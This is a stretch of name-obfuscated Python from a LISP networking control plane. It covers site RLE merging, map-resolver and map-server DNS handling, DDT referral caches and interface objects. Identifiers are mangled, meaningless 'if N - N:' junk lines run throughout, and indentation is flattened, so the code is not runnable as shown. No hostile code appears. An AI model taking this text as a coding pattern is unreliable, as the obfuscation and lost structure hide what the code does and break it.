if 66 - 66: iII111i - IiII . I1Ii111
if 29 - 29: I1Ii111 - Ii1I + O0 - oO0o - O0
if 68 - 68: iII111i + II111iiii + I1ii11iIi11i * OOooOOo / oO0o
if 41 - 41: OOooOOo + Oo0Ooo % I1IiiI
if 3 - 3: ooOoO0o * Ii1I
if 29 - 29: OoooooooOO + OOooOOo
if 68 - 68: O0 + IiII / iII111i - OoOoOO00
if 5 - 5: I1IiiI * OoooooooOO - II111iiii
o00O = [ ]
for IiIIIi in self . registered_rlocs :
if ( self . registered_rlocs . index ( IiIIIi ) == 0 ) :
o00O . append ( IiIIIi )
continue
if 68 - 68: iIii1I11I1II1 / II111iiii
if ( IiIIIi . rle == None ) : o00O . append ( IiIIIi )
if 47 - 47: i11iIiiIii . OOooOOo + I1Ii111 / I1ii11iIi11i . I1IiiI . I1Ii111
self . registered_rlocs = o00O
if 79 - 79: OoO0O00 / i11iIiiIii . IiII - I11i / iIii1I11I1II1
if 81 - 81: Oo0Ooo . II111iiii + i11iIiiIii - OoOoOO00 * ooOoO0o
if 25 - 25: Ii1I / Oo0Ooo
if 79 - 79: o0oOOo0O0Ooo . i1IIi % I1ii11iIi11i % II111iiii . iIii1I11I1II1
if 45 - 45: I1ii11iIi11i / iIii1I11I1II1 + OoO0O00 / O0 - O0 - I1Ii111
if 88 - 88: o0oOOo0O0Ooo % I1Ii111
if 4 - 4: i11iIiiIii + o0oOOo0O0Ooo % I11i - I1ii11iIi11i * I1ii11iIi11i
OoO000oo000o0 = lisp_rle ( "" )
o0Ooo00oooo = { }
Ooo000oo0OO0 = None
for O0oiiii1i1i11I in self . individual_registrations . values ( ) :
if ( O0oiiii1i1i11I . registered == False ) : continue
IiiiiIIii = O0oiiii1i1i11I . registered_rlocs [ 0 ] . rle
if ( IiiiiIIii == None ) : continue
if 59 - 59: Ii1I + iIii1I11I1II1 % I1ii11iIi11i . OOooOOo / iIii1I11I1II1 - o0oOOo0O0Ooo
Ooo000oo0OO0 = O0oiiii1i1i11I . registered_rlocs [ 0 ] . rloc_name
for iIIiii1I11 in IiiiiIIii . rle_nodes :
O0o00o000oO = iIIiii1I11 . address . print_address_no_iid ( )
if ( o0Ooo00oooo . has_key ( O0o00o000oO ) ) : break
if 14 - 14: IiII + I11i - o0oOOo0O0Ooo
Oo0000O00o0 = lisp_rle_node ( )
Oo0000O00o0 . address . copy_address ( iIIiii1I11 . address )
Oo0000O00o0 . level = iIIiii1I11 . level
Oo0000O00o0 . rloc_name = Ooo000oo0OO0
OoO000oo000o0 . rle_nodes . append ( Oo0000O00o0 )
o0Ooo00oooo [ O0o00o000oO ] = iIIiii1I11 . address
if 100 - 100: ooOoO0o
if 29 - 29: II111iiii % II111iiii - OoooooooOO * OoooooooOO
if 54 - 54: iII111i / OoO0O00 . O0 * iII111i % OoOoOO00 % iIii1I11I1II1
if 37 - 37: iII111i - ooOoO0o * Ii1I + II111iiii * i11iIiiIii
if 8 - 8: OoooooooOO % I11i - iII111i * OOooOOo . O0
if 40 - 40: I1Ii111 . oO0o + OoO0O00 % Oo0Ooo / II111iiii
if ( len ( OoO000oo000o0 . rle_nodes ) == 0 ) : OoO000oo000o0 = None
if ( len ( self . registered_rlocs ) != 0 ) :
self . registered_rlocs [ 0 ] . rle = OoO000oo000o0
if ( Ooo000oo0OO0 ) : self . registered_rlocs [ 0 ] . rloc_name = None
if 19 - 19: i11iIiiIii
if 20 - 20: i11iIiiIii . II111iiii - I1ii11iIi11i / ooOoO0o % i11iIiiIii
if 35 - 35: Oo0Ooo - I1ii11iIi11i . Oo0Ooo
if 13 - 13: II111iiii / OoOoOO00 * iII111i % O0 % I1ii11iIi11i * i11iIiiIii
if 92 - 92: i11iIiiIii + OoO0O00
if ( IiiI1I1iIii . keys ( ) == o0Ooo00oooo . keys ( ) ) : return ( False )
if 94 - 94: I1ii11iIi11i + OoO0O00 . II111iiii + oO0o . II111iiii
lprint ( "{} {} from {} to {}" . format ( green ( self . print_eid_tuple ( ) , False ) , bold ( "RLE change" , False ) ,
# i11iIiiIii . Ii1I - ooOoO0o * iII111i - iII111i - i11iIiiIii
IiiI1I1iIii . keys ( ) , o0Ooo00oooo . keys ( ) ) )
if 6 - 6: I1ii11iIi11i / iIii1I11I1II1 / I11i % iIii1I11I1II1
return ( True )
if 49 - 49: OOooOOo * iIii1I11I1II1 - iIii1I11I1II1
if 70 - 70: OoO0O00 % i11iIiiIii * IiII . I11i * Oo0Ooo
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . add_cache ( self . eid , self )
else :
oo0OO0O0 = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( oo0OO0O0 == None ) :
oo0OO0O0 = lisp_site_eid ( self . site )
oo0OO0O0 . eid . copy_address ( self . group )
oo0OO0O0 . group . copy_address ( self . group )
lisp_sites_by_eid . add_cache ( self . group , oo0OO0O0 )
if 17 - 17: i1IIi
if 29 - 29: OOooOOo % OoO0O00 + oO0o + o0oOOo0O0Ooo . iII111i
if 14 - 14: i1IIi + OoOoOO00 * oO0o - II111iiii + IiII + OoOoOO00
if 42 - 42: Oo0Ooo + iII111i * ooOoO0o
if 72 - 72: iIii1I11I1II1 % I1Ii111
oo0OO0O0 . parent_for_more_specifics = self . parent_for_more_specifics
if 77 - 77: I1Ii111 * I1IiiI / iIii1I11I1II1 . II111iiii * Oo0Ooo
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( oo0OO0O0 . group )
oo0OO0O0 . add_source_entry ( self )
if 71 - 71: ooOoO0o / iIii1I11I1II1 % O0 / I1ii11iIi11i . I1Ii111 / i11iIiiIii
if 6 - 6: oO0o . OoO0O00 - II111iiii . I1IiiI - o0oOOo0O0Ooo - i1IIi
if 42 - 42: Ii1I + i11iIiiIii
def delete_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_sites_by_eid . delete_cache ( self . eid )
else :
oo0OO0O0 = lisp_sites_by_eid . lookup_cache ( self . group , True )
if ( oo0OO0O0 == None ) : return
if 46 - 46: O0 % OoOoOO00 - I1Ii111 . I1IiiI
O0oiiii1i1i11I = oo0OO0O0 . lookup_source_cache ( self . eid , True )
if ( O0oiiii1i1i11I == None ) : return
if 66 - 66: II111iiii * iIii1I11I1II1 * ooOoO0o * I11i . II111iiii - ooOoO0o
if ( oo0OO0O0 . source_cache == None ) : return
if 15 - 15: I1ii11iIi11i - i11iIiiIii - Ii1I / Ii1I . iII111i
oo0OO0O0 . source_cache . delete_cache ( self . eid )
if ( oo0OO0O0 . source_cache . cache_size ( ) == 0 ) :
lisp_sites_by_eid . delete_cache ( self . group )
if 36 - 36: oO0o + Oo0Ooo * I1Ii111 % OOooOOo . Oo0Ooo . I1IiiI
if 81 - 81: o0oOOo0O0Ooo . OoOoOO00 . i11iIiiIii
if 13 - 13: i1IIi
if 70 - 70: O0 / II111iiii
def add_source_entry ( self , source_se ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_se . eid , source_se )
if 98 - 98: OoOoOO00 - O0 . O0 + ooOoO0o * iIii1I11I1II1
if 7 - 7: IiII * OoOoOO00 + iIii1I11I1II1 / OoOoOO00 + Oo0Ooo / o0oOOo0O0Ooo
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 77 - 77: i1IIi . I1IiiI
if 59 - 59: O0 + OoooooooOO - i1IIi
def is_star_g ( self ) :
if ( self . group . is_null ( ) ) : return ( False )
return ( self . eid . is_exact_match ( self . group ) )
if 87 - 87: IiII * OoooooooOO / Oo0Ooo % iIii1I11I1II1 % oO0o
if 97 - 97: ooOoO0o % i1IIi . IiII / Oo0Ooo . I1Ii111 . OoO0O00
def eid_record_matches ( self , eid_record ) :
if ( self . eid . is_exact_match ( eid_record . eid ) == False ) : return ( False )
if ( eid_record . group . is_null ( ) ) : return ( True )
return ( eid_record . group . is_exact_match ( self . group ) )
if 12 - 12: I1IiiI
if 99 - 99: II111iiii - OoOoOO00
def inherit_from_ams_parent ( self ) :
II1i1i = self . parent_for_more_specifics
if ( II1i1i == None ) : return
self . force_proxy_reply = II1i1i . force_proxy_reply
self . force_nat_proxy_reply = II1i1i . force_nat_proxy_reply
self . force_ttl = II1i1i . force_ttl
self . pitr_proxy_reply_drop = II1i1i . pitr_proxy_reply_drop
self . proxy_reply_action = II1i1i . proxy_reply_action
self . echo_nonce_capable = II1i1i . echo_nonce_capable
self . policy = II1i1i . policy
self . require_signature = II1i1i . require_signature
if 22 - 22: i11iIiiIii * II111iiii
if 11 - 11: Oo0Ooo % i1IIi
def rtrs_in_rloc_set ( self ) :
for IiIIIi in self . registered_rlocs :
if ( IiIIIi . is_rtr ( ) ) : return ( True )
if 70 - 70: II111iiii * Oo0Ooo * OOooOOo - I1IiiI + iIii1I11I1II1 + ooOoO0o
return ( False )
if 27 - 27: I1ii11iIi11i - I1Ii111 * O0 % ooOoO0o / I1IiiI
if 53 - 53: i11iIiiIii * i11iIiiIii % O0 % IiII
def is_rtr_in_rloc_set ( self , rtr_rloc ) :
for IiIIIi in self . registered_rlocs :
if ( IiIIIi . rloc . is_exact_match ( rtr_rloc ) == False ) : continue
if ( IiIIIi . is_rtr ( ) ) : return ( True )
if 57 - 57: I1IiiI % i1IIi * OoO0O00 + I1Ii111 . I11i % I11i
return ( False )
if 69 - 69: I1ii11iIi11i / OoOoOO00 + iIii1I11I1II1
if 8 - 8: OoooooooOO
def is_rloc_in_rloc_set ( self , rloc ) :
for IiIIIi in self . registered_rlocs :
if ( IiIIIi . rle ) :
for OoO000oo000o0 in IiIIIi . rle . rle_nodes :
if ( OoO000oo000o0 . address . is_exact_match ( rloc ) ) : return ( True )
if 72 - 72: OoooooooOO % I1ii11iIi11i - OoO0O00 . OoooooooOO
if 83 - 83: o0oOOo0O0Ooo * Ii1I - Oo0Ooo * iII111i - i11iIiiIii
if ( IiIIIi . rloc . is_exact_match ( rloc ) ) : return ( True )
if 6 - 6: I1IiiI + i11iIiiIii + O0 / i1IIi
return ( False )
if 50 - 50: iII111i . II111iiii % I1Ii111 % I1IiiI / o0oOOo0O0Ooo . I1IiiI
if 76 - 76: OOooOOo % iII111i
def do_rloc_sets_match ( self , prev_rloc_set ) :
if ( len ( self . registered_rlocs ) != len ( prev_rloc_set ) ) : return ( False )
if 80 - 80: iIii1I11I1II1 + o0oOOo0O0Ooo + iIii1I11I1II1
for IiIIIi in prev_rloc_set :
iiiIii = IiIIIi . rloc
if ( self . is_rloc_in_rloc_set ( iiiIii ) == False ) : return ( False )
if 63 - 63: OoOoOO00 - o0oOOo0O0Ooo % II111iiii - Ii1I
return ( True )
if 81 - 81: iII111i % OOooOOo * oO0o
if 84 - 84: iII111i - OoooooooOO + I1ii11iIi11i - I1IiiI
if 52 - 52: oO0o / ooOoO0o / iII111i / OoOoOO00 * iIii1I11I1II1
class lisp_mr ( ) :
def __init__ ( self , addr_str , dns_name , mr_name ) :
self . mr_name = mr_name if ( mr_name != None ) else "all"
self . dns_name = dns_name
self . map_resolver = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . last_dns_resolve = None
self . a_record_index = 0
if ( addr_str ) :
self . map_resolver . store_address ( addr_str )
self . insert_mr ( )
else :
self . resolve_dns_name ( )
if 74 - 74: oO0o . I1ii11iIi11i - iIii1I11I1II1
self . last_used = 0
self . last_reply = 0
self . last_nonce = 0
self . map_requests_sent = 0
self . neg_map_replies_received = 0
self . total_rtt = 0
if 73 - 73: OoO0O00 / O0 . o0oOOo0O0Ooo
if 100 - 100: Ii1I . OoO0O00 % I1ii11iIi11i % O0 * Oo0Ooo - OoOoOO00
def resolve_dns_name ( self ) :
if ( self . dns_name == None ) : return
if ( self . last_dns_resolve and
time . time ( ) - self . last_dns_resolve < 30 ) : return
if 15 - 15: OOooOOo - OOooOOo - OoooooooOO * OoO0O00
try :
I1i1II1 = socket . gethostbyname_ex ( self . dns_name )
self . last_dns_resolve = lisp_get_timestamp ( )
Iii1111IIiI1 = I1i1II1 [ 2 ]
except :
return
if 48 - 48: I1Ii111 * iII111i
if 93 - 93: I11i % iIii1I11I1II1 + Ii1I - I1IiiI + OoooooooOO . IiII
if 77 - 77: i11iIiiIii . OoooooooOO % iIii1I11I1II1 % I1Ii111
if 22 - 22: iIii1I11I1II1 + Ii1I / OOooOOo - oO0o * oO0o / IiII
if 91 - 91: I11i - II111iiii + o0oOOo0O0Ooo + i1IIi + I1ii11iIi11i % Ii1I
if 57 - 57: o0oOOo0O0Ooo - I1Ii111 / OoooooooOO . OoooooooOO
if ( len ( Iii1111IIiI1 ) <= self . a_record_index ) :
self . delete_mr ( )
return
if 44 - 44: oO0o / II111iiii % I1IiiI - II111iiii / OoooooooOO
if 4 - 4: I11i * OoOoOO00
O0o00o000oO = Iii1111IIiI1 [ self . a_record_index ]
if ( O0o00o000oO != self . map_resolver . print_address_no_iid ( ) ) :
self . delete_mr ( )
self . map_resolver . store_address ( O0o00o000oO )
self . insert_mr ( )
if 18 - 18: iIii1I11I1II1 % OOooOOo - I1ii11iIi11i * i1IIi + Oo0Ooo
if 87 - 87: oO0o . I11i
if 15 - 15: oO0o
if 45 - 45: Oo0Ooo * IiII * OoO0O00 + iIii1I11I1II1
if 89 - 89: IiII . IiII . oO0o % iII111i
if 27 - 27: OoOoOO00 + O0 % i1IIi - Oo0Ooo
if ( lisp_is_decent_dns_suffix ( self . dns_name ) == False ) : return
if ( self . a_record_index != 0 ) : return
if 96 - 96: O0 % o0oOOo0O0Ooo + OOooOOo % I1IiiI
for O0o00o000oO in Iii1111IIiI1 [ 1 : : ] :
O0o00O0Oo0 = lisp_address ( LISP_AFI_NONE , O0o00o000oO , 0 , 0 )
ii1 = lisp_get_map_resolver ( O0o00O0Oo0 , None )
if ( ii1 != None and ii1 . a_record_index == Iii1111IIiI1 . index ( O0o00o000oO ) ) :
continue
if 51 - 51: i1IIi . o0oOOo0O0Ooo % I1IiiI - OoooooooOO / OoOoOO00 - I11i
ii1 = lisp_mr ( O0o00o000oO , None , None )
ii1 . a_record_index = Iii1111IIiI1 . index ( O0o00o000oO )
ii1 . dns_name = self . dns_name
ii1 . last_dns_resolve = lisp_get_timestamp ( )
if 45 - 45: O0 * II111iiii / i11iIiiIii
if 38 - 38: OoooooooOO % i11iIiiIii - O0 / O0
if 59 - 59: OoO0O00 % iII111i + oO0o * II111iiii . OOooOOo
if 26 - 26: OOooOOo % OoooooooOO . Ii1I / iIii1I11I1II1 * I1IiiI
if 85 - 85: IiII / Ii1I - I1ii11iIi11i * OOooOOo
ii1111Ii = [ ]
for ii1 in lisp_map_resolvers_list . values ( ) :
if ( self . dns_name != ii1 . dns_name ) : continue
O0o00O0Oo0 = ii1 . map_resolver . print_address_no_iid ( )
if ( O0o00O0Oo0 in Iii1111IIiI1 ) : continue
ii1111Ii . append ( ii1 )
if 8 - 8: oO0o - iIii1I11I1II1 * iII111i
for ii1 in ii1111Ii : ii1 . delete_mr ( )
if 15 - 15: II111iiii * O0 % I1ii11iIi11i % Ii1I . OoOoOO00
if 8 - 8: IiII / Oo0Ooo % OOooOOo + O0 - Ii1I
def insert_mr ( self ) :
iII1 = self . mr_name + self . map_resolver . print_address ( )
lisp_map_resolvers_list [ iII1 ] = self
if 43 - 43: O0 % i11iIiiIii + o0oOOo0O0Ooo . I11i / OOooOOo . O0
if 30 - 30: i11iIiiIii + i1IIi
def delete_mr ( self ) :
iII1 = self . mr_name + self . map_resolver . print_address ( )
if ( lisp_map_resolvers_list . has_key ( iII1 ) == False ) : return
lisp_map_resolvers_list . pop ( iII1 )
if 52 - 52: OoooooooOO % OoOoOO00 / IiII % OoO0O00
if 36 - 36: II111iiii . O0 % O0 * iII111i * iIii1I11I1II1
if 42 - 42: iII111i . OOooOOo + oO0o / OoOoOO00
class lisp_ddt_root ( ) :
def __init__ ( self ) :
self . root_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . public_key = ""
self . priority = 0
self . weight = 0
if 54 - 54: ooOoO0o % o0oOOo0O0Ooo + i11iIiiIii / ooOoO0o * II111iiii * Ii1I
if 52 - 52: ooOoO0o + IiII * OoOoOO00 - OoO0O00 - OoooooooOO - oO0o
if 60 - 60: iII111i / oO0o
class lisp_referral ( ) :
def __init__ ( self ) :
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . referral_set = { }
self . referral_type = LISP_DDT_ACTION_NULL
self . referral_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . referral_ttl = 0
self . uptime = lisp_get_timestamp ( )
self . expires = 0
self . source_cache = None
if 98 - 98: OoOoOO00 / OOooOOo
if 31 - 31: II111iiii % I11i - I11i
def print_referral ( self , eid_indent , referral_indent ) :
I1II11i11Iiii = lisp_print_elapsed ( self . uptime )
iiI111I11 = lisp_print_future ( self . expires )
lprint ( "{}Referral EID {}, uptime/expires {}/{}, {} referrals:" . format ( eid_indent , green ( self . eid . print_prefix ( ) , False ) , I1II11i11Iiii ,
# iIii1I11I1II1 . i11iIiiIii / OOooOOo
iiI111I11 , len ( self . referral_set ) ) )
if 27 - 27: I1IiiI / Ii1I * iIii1I11I1II1 * iIii1I11I1II1 + ooOoO0o
for IiIiII11 in self . referral_set . values ( ) :
IiIiII11 . print_ref_node ( referral_indent )
if 92 - 92: OOooOOo
if 34 - 34: I1ii11iIi11i . OOooOOo + OoO0O00 % o0oOOo0O0Ooo * O0 * I1IiiI
if 9 - 9: IiII / i11iIiiIii . o0oOOo0O0Ooo - OOooOOo % I1Ii111
def print_referral_type ( self ) :
if ( self . eid . afi == LISP_AFI_ULTIMATE_ROOT ) : return ( "root" )
if ( self . referral_type == LISP_DDT_ACTION_NULL ) :
return ( "null-referral" )
if 65 - 65: I1IiiI % OoOoOO00
if ( self . referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND ) :
return ( "no-site-action" )
if 45 - 45: o0oOOo0O0Ooo
if ( self . referral_type > LISP_DDT_ACTION_MAX ) :
return ( "invalid-action" )
if 33 - 33: ooOoO0o % O0 % I1ii11iIi11i % o0oOOo0O0Ooo + i11iIiiIii . I1Ii111
return ( lisp_map_referral_action_string [ self . referral_type ] )
if 21 - 21: I1Ii111 * I1ii11iIi11i * ooOoO0o
if 73 - 73: OoOoOO00 * O0
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 1 - 1: OOooOOo * OoooooooOO
if 46 - 46: I1ii11iIi11i * I1Ii111 / OOooOOo / I1IiiI
def print_ttl ( self ) :
oo0OOoOO0 = self . referral_ttl
if ( oo0OOoOO0 < 60 ) : return ( str ( oo0OOoOO0 ) + " secs" )
if 7 - 7: OOooOOo / OoOoOO00
if ( ( oo0OOoOO0 % 60 ) == 0 ) :
oo0OOoOO0 = str ( oo0OOoOO0 / 60 ) + " mins"
else :
oo0OOoOO0 = str ( oo0OOoOO0 ) + " secs"
if 93 - 93: iIii1I11I1II1 * Ii1I - iII111i
return ( oo0OOoOO0 )
if 94 - 94: iIii1I11I1II1 * iIii1I11I1II1 * I11i % i11iIiiIii
if 38 - 38: I1IiiI % I1ii11iIi11i * I1IiiI + OOooOOo - OoOoOO00
def is_referral_negative ( self ) :
return ( self . referral_type in ( LISP_DDT_ACTION_MS_NOT_REG , LISP_DDT_ACTION_DELEGATION_HOLE ,
# Oo0Ooo / I1Ii111 % I11i + I11i + iIii1I11I1II1
LISP_DDT_ACTION_NOT_AUTH ) )
if 38 - 38: i11iIiiIii + iII111i
if 49 - 49: o0oOOo0O0Ooo
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_referral_cache . add_cache ( self . eid , self )
else :
iiiI11i1ii1i = lisp_referral_cache . lookup_cache ( self . group , True )
if ( iiiI11i1ii1i == None ) :
iiiI11i1ii1i = lisp_referral ( )
iiiI11i1ii1i . eid . copy_address ( self . group )
iiiI11i1ii1i . group . copy_address ( self . group )
lisp_referral_cache . add_cache ( self . group , iiiI11i1ii1i )
if 47 - 47: iII111i % i11iIiiIii / ooOoO0o + IiII . iII111i % iII111i
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( iiiI11i1ii1i . group )
iiiI11i1ii1i . add_source_entry ( self )
if 18 - 18: o0oOOo0O0Ooo * OoooooooOO % i1IIi
if 17 - 17: iII111i . o0oOOo0O0Ooo / II111iiii % Oo0Ooo
if 1 - 1: OOooOOo % o0oOOo0O0Ooo * o0oOOo0O0Ooo / oO0o
def delete_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_referral_cache . delete_cache ( self . eid )
else :
iiiI11i1ii1i = lisp_referral_cache . lookup_cache ( self . group , True )
if ( iiiI11i1ii1i == None ) : return
if 79 - 79: oO0o . OOooOOo
O0i1I1iI1Iiii1I = iiiI11i1ii1i . lookup_source_cache ( self . eid , True )
if ( O0i1I1iI1Iiii1I == None ) : return
if 82 - 82: I1Ii111 % II111iiii
iiiI11i1ii1i . source_cache . delete_cache ( self . eid )
if ( iiiI11i1ii1i . source_cache . cache_size ( ) == 0 ) :
lisp_referral_cache . delete_cache ( self . group )
if 10 - 10: II111iiii * Ii1I % IiII + I11i
if 29 - 29: IiII / Ii1I / I1Ii111
if 30 - 30: i1IIi + OOooOOo + Oo0Ooo % iII111i % O0 + i1IIi
if 45 - 45: ooOoO0o
def add_source_entry ( self , source_ref ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_ref . eid , source_ref )
if 89 - 89: iIii1I11I1II1 . I1Ii111
if 43 - 43: Oo0Ooo + o0oOOo0O0Ooo % o0oOOo0O0Ooo % I1ii11iIi11i / iIii1I11I1II1 . I1ii11iIi11i
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 59 - 59: IiII . OoO0O00 - OoooooooOO . O0
if 33 - 33: Ii1I
if 95 - 95: OoooooooOO + OoO0O00 * ooOoO0o
class lisp_referral_node ( ) :
def __init__ ( self ) :
self . referral_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . priority = 0
self . weight = 0
self . updown = True
self . map_requests_sent = 0
self . no_responses = 0
self . uptime = lisp_get_timestamp ( )
if 40 - 40: I1IiiI / OOooOOo * Ii1I
if 98 - 98: I1IiiI
def print_ref_node ( self , indent ) :
Oo0OO0000oooo = lisp_print_elapsed ( self . uptime )
lprint ( "{}referral {}, uptime {}, {}, priority/weight: {}/{}" . format ( indent , red ( self . referral_address . print_address ( ) , False ) , Oo0OO0000oooo ,
# o0oOOo0O0Ooo
"up" if self . updown else "down" , self . priority , self . weight ) )
if 79 - 79: O0 / II111iiii
if 39 - 39: IiII
if 79 - 79: iIii1I11I1II1 * oO0o . iIii1I11I1II1 * O0
class lisp_ms ( ) :
def __init__ ( self , addr_str , dns_name , ms_name , alg_id , key_id , pw , pr ,
mr , rr , wmn , site_id , ekey_id , ekey ) :
self . ms_name = ms_name if ( ms_name != None ) else "all"
self . dns_name = dns_name
self . map_server = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . last_dns_resolve = None
self . a_record_index = 0
if ( lisp_map_servers_list == { } ) :
self . xtr_id = lisp_get_control_nonce ( )
else :
self . xtr_id = lisp_map_servers_list . values ( ) [ 0 ] . xtr_id
if 13 - 13: I1ii11iIi11i . IiII - I11i
self . alg_id = alg_id
self . key_id = key_id
self . password = pw
self . proxy_reply = pr
self . merge_registrations = mr
self . refresh_registrations = rr
self . want_map_notify = wmn
self . site_id = site_id
self . map_registers_sent = 0
self . map_registers_multicast_sent = 0
self . map_notifies_received = 0
self . map_notify_acks_sent = 0
self . ekey_id = ekey_id
self . ekey = ekey
if ( addr_str ) :
self . map_server . store_address ( addr_str )
self . insert_ms ( )
else :
self . resolve_dns_name ( )
if 81 - 81: i11iIiiIii
if 7 - 7: IiII - OoOoOO00 * i1IIi
if 14 - 14: I1ii11iIi11i . OoO0O00
def resolve_dns_name ( self ) :
if ( self . dns_name == None ) : return
if ( self . last_dns_resolve and
time . time ( ) - self . last_dns_resolve < 30 ) : return
if 26 - 26: iII111i / ooOoO0o / Oo0Ooo / Oo0Ooo . I1ii11iIi11i * OOooOOo
try :
I1i1II1 = socket . gethostbyname_ex ( self . dns_name )
self . last_dns_resolve = lisp_get_timestamp ( )
Iii1111IIiI1 = I1i1II1 [ 2 ]
except :
return
if 25 - 25: IiII % I1IiiI / O0 % OOooOOo - OoooooooOO
if 29 - 29: O0 + iII111i
if 4 - 4: I11i * I11i - Ii1I * oO0o . I1ii11iIi11i % o0oOOo0O0Ooo
if 33 - 33: Ii1I * i11iIiiIii / O0 . Oo0Ooo + i1IIi . OoOoOO00
if 76 - 76: OoooooooOO - O0
if 17 - 17: Oo0Ooo % I1Ii111 . oO0o - O0
if ( len ( Iii1111IIiI1 ) <= self . a_record_index ) :
self . delete_ms ( )
return
if 32 - 32: O0 % O0
if 66 - 66: iII111i / i1IIi - Oo0Ooo . Ii1I
O0o00o000oO = Iii1111IIiI1 [ self . a_record_index ]
if ( O0o00o000oO != self . map_server . print_address_no_iid ( ) ) :
self . delete_ms ( )
self . map_server . store_address ( O0o00o000oO )
self . insert_ms ( )
if 65 - 65: I1ii11iIi11i % ooOoO0o - OoOoOO00 + ooOoO0o + Oo0Ooo
if 95 - 95: I1Ii111 * i11iIiiIii - I1IiiI - OoOoOO00 . ooOoO0o
if 34 - 34: OoooooooOO % I1ii11iIi11i + OoooooooOO % i11iIiiIii / IiII - ooOoO0o
if 74 - 74: iIii1I11I1II1 % II111iiii + IiII
if 71 - 71: I1IiiI / O0 * i1IIi . i1IIi + Oo0Ooo
if 32 - 32: i1IIi * I1Ii111 % I1IiiI / IiII . I1Ii111
if ( lisp_is_decent_dns_suffix ( self . dns_name ) == False ) : return
if ( self . a_record_index != 0 ) : return
if 11 - 11: OOooOOo
for O0o00o000oO in Iii1111IIiI1 [ 1 : : ] :
O0o00O0Oo0 = lisp_address ( LISP_AFI_NONE , O0o00o000oO , 0 , 0 )
Ii1IIII = lisp_get_map_server ( O0o00O0Oo0 )
if ( Ii1IIII != None and Ii1IIII . a_record_index == Iii1111IIiI1 . index ( O0o00o000oO ) ) :
continue
if 25 - 25: i1IIi
Ii1IIII = copy . deepcopy ( self )
Ii1IIII . map_server . store_address ( O0o00o000oO )
Ii1IIII . a_record_index = Iii1111IIiI1 . index ( O0o00o000oO )
Ii1IIII . last_dns_resolve = lisp_get_timestamp ( )
Ii1IIII . insert_ms ( )
if 99 - 99: OOooOOo + OoooooooOO . I1Ii111 * Oo0Ooo % oO0o
if 75 - 75: iII111i
if 8 - 8: I1ii11iIi11i . I11i / I1ii11iIi11i - i1IIi
if 22 - 22: OOooOOo
if 7 - 7: O0 - I1ii11iIi11i - OoO0O00 * I1Ii111
ii1111Ii = [ ]
for Ii1IIII in lisp_map_servers_list . values ( ) :
if ( self . dns_name != Ii1IIII . dns_name ) : continue
O0o00O0Oo0 = Ii1IIII . map_server . print_address_no_iid ( )
if ( O0o00O0Oo0 in Iii1111IIiI1 ) : continue
ii1111Ii . append ( Ii1IIII )
if 17 - 17: o0oOOo0O0Ooo % OoO0O00 - I11i * o0oOOo0O0Ooo - i1IIi / I1IiiI
for Ii1IIII in ii1111Ii : Ii1IIII . delete_ms ( )
if 100 - 100: OoO0O00 * i1IIi * o0oOOo0O0Ooo * Oo0Ooo - o0oOOo0O0Ooo
if 100 - 100: iII111i - i11iIiiIii + OoO0O00
def insert_ms ( self ) :
iII1 = self . ms_name + self . map_server . print_address ( )
lisp_map_servers_list [ iII1 ] = self
if 50 - 50: II111iiii
if 42 - 42: OOooOOo * I1Ii111
def delete_ms ( self ) :
iII1 = self . ms_name + self . map_server . print_address ( )
if ( lisp_map_servers_list . has_key ( iII1 ) == False ) : return
lisp_map_servers_list . pop ( iII1 )
if 53 - 53: II111iiii % OOooOOo / I1ii11iIi11i * OoOoOO00 % I1ii11iIi11i * iII111i
if 91 - 91: iII111i . OoooooooOO
if 90 - 90: i11iIiiIii - I1IiiI
class lisp_interface ( ) :
def __init__ ( self , device ) :
self . interface_name = ""
self . device = device
self . instance_id = None
self . bridge_socket = None
self . raw_socket = None
self . dynamic_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . dynamic_eid_device = None
self . dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self . multi_tenant_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
if 39 - 39: iII111i % OoooooooOO % Ii1I % I1IiiI
if 63 - 63: OoO0O00 - I1Ii111 - II111iiii
def add_interface ( self ) :
lisp_myinterfaces [ self . device ] = self
if 79 - 79: II111iiii - II111iiii + OoOoOO00 / iII111i % OoooooooOO - OoO0O00
if 22 - 22: o0oOOo0O0Ooo + I1Ii111 . Oo0Ooo
def get_instance_id ( self ) :
return ( self . instance_id )
if 84 - 84: O0 + I1IiiI % Oo0Ooo + OOooOOo
if 94 - 94: OOooOOo
def get_socket ( self ) :
return ( self . raw_socket )
if 81 - 81: i11iIiiIii + iIii1I11I1II1 . i11iIiiIii / OOooOOo / iII111i
if 34 - 34: i11iIiiIii - o0oOOo0O0Ooo * OoooooooOO * I1ii11iIi11i * Oo0Ooo % I1ii11iIi11i
def get_bridge_socket ( self ) :
return ( self . bridge_socket )
if 31 - 31: I11i . o0oOOo0O0Ooo
if 82 - 82: I11i - Oo0Ooo
def does_dynamic_eid_match ( self , eid ) :
if ( self . dynamic_eid . is_null ( ) ) : return ( False )
return ( eid . is_more_specific ( self . dynamic_eid ) )
